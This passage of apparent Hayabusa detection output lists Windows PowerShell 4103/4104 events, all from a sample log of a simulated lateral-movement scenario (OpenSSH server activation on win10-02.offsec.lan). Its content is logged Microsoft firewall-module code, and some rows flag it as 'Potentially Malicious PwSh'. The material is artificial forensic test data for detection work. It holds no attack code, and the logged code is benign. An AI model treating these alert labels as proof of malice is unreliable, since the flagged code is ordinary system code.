ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.403 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.403 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.404 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.434 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
